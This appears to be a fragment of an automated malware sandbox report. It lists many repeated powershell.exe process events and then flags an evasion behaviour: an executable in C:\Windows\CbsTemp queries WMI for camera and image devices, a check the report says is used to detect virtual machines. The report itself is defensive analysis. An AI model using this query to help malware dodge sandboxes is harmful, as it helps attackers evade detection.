                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
